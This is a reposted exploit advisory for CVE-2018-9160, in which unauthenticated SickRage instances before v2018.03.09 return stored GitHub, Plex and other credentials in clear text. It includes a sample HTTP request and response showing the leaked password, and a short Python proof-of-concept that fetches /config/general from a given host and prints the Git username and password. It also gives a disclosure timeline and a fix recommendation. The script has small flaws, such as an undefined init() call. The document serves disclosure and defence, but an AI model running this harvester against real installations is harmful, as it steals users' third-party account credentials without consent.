首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
来源:vfocus.net 作者:Fassbender 发布时间:2018-04-27  
# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
# Date: 2018-04-01
# Exploit Author: Sven Fassbender
# Vendor Homepage: https://sickrage.github.io
# Software Link: https://github.com/SickRage/SickRage
# Version: < v2018.03.09-1
# CVE : CVE-2018-9160
# Category: webapps
 
#1. Background information
 
"SickRage is an automatic Video Library Manager for TV Shows.
It watches for new episodes of your favourite shows, and when they are posted it does its magic:
automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io
 
#2. Vulnerability description
 
SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses.
Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)
 
HTTP request:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
 
     
HTTP response:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
 
 
<!DOCTYPE html>
<html lang="nl_NL">
    <head>
        [...]
        <input type="text" name="git_username" id="git_username" value="email@example.com" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
        [...]
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
        [...]
        </div>
    </body>
</html>
 
#3. Proof of Concept
 
#!/usr/bin/env python
import urllib3
import sys
import requests
from BeautifulSoup import BeautifulSoup
 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
 
if __name__ == '__main__':
    if len(sys.argv) != 3:
        print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
    else:
        host = sys.argv[1]
        print "https://www.shodan.io/host/{0}".format(host)
        port = sys.argv[2]
        print "*** Get GitHub User credentials from SickRage ***"
        url = "http://{0}:{1}/config/general".format(host, port)
        response = requests.get(url, timeout=5)
        parsed_html = BeautifulSoup(response.text)
        try:
            git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
            git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value")
            if str(git_password) != "None" and str(git_password) != "None":
                if len(git_password) >= 1 and len(git_username) >= 1:
                    print str(git_username)
                    print str(git_password)
        except AttributeError:
            pass
 
 
#4. Timeline
 
[2018-03-07] Vulnerability discovered
[2018-03-08] Vendor contacted
[2018-03-08] Vendor replied
[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
 
#5. Recommendation
 
Update the SickRage installation on v2018.03.09-1 or later.
Protect the access to the web application with proper user credentials.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chrome V8 JIT - Arrow Function
·GitList 0.6 - Unauthenticated
·Chrome V8 JIT - 'AwaitedPromis
·Allok AVI to DVD SVCD VCD Conv
·VMware Workstation 12.5.2 - Dr
·Drupal Drupalgeddon 2 Forms AP
·Easy File Sharing Web Server 7
·osCommerce Installer Unauthent
·Allok Video to DVD Burner 2.6.
·Oracle Weblogic Server 10.3.6.
·R 3.4.4 - Local Buffer Overflo
·Drupal < 7.58 - 'Drupalgeddon3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved